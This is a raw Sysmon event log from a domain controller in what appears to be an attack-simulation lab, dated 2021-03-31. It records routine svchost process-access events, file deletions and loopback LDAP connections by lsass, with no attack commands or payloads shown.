12:02:16.620{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004998Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.620{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004997Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:16.604{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004996Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.604{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004995Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:16.604{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004994Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.604{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004993Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:16.604{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004992Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.604{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004991Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:16.604{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000004990Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.588{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=20CC4A28897D32F4420B28E259F95796,SHA256=67E308DD38C7E45F1CFAD10FBFA06729BE6492BB9D8CAA7D0C6F693A87F9B31C,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000004989Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:16.588{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004988Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.588{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004987Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:16.588{266CAFBE-64C6-6064-A900-00000000AE01}34042980C:\Windows\system32\svchost.exe{266CAFBE-64C5-6064-A700-00000000AE01}4388C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\appxdeploymentserver.dll+6468b|c:\windows\system32\appxdeploymentserver.dll+2d35e|c:\windows\system32\appxdeploymentserver.dll+2d19d|c:\windows\system32\appxdeploymentserver.dll+114d56|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000004986Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.588{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Windows\AppReadiness\S-1-5-21-4055678433-3894535204-3898404691-500MD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000004985Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:14.479{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53581-true0:0:0:0:0:0:0:1win-dc-892.attackrange.local3268msft-gc 354300x80000000000000004984Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:14.479{266CAFBE-647D-6064-3000-00000000AE01}2648C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT 
AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53581-true0:0:0:0:0:0:0:1win-dc-892.attackrange.local3268msft-gc 354300x80000000000000004983Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:14.474{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53580-true0:0:0:0:0:0:0:1win-dc-892.attackrange.local389ldap 354300x80000000000000004982Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:14.474{266CAFBE-647D-6064-3000-00000000AE01}2648C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53580-true0:0:0:0:0:0:0:1win-dc-892.attackrange.local389ldap 10341000x80000000000000004981Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.557{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004980Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:16.557{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004979Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.557{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004978Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:16.557{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004977Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.557{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004976Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:16.557{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004975Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.557{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004974Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:16.557{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004973Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.557{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004972Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:16.557{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004971Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 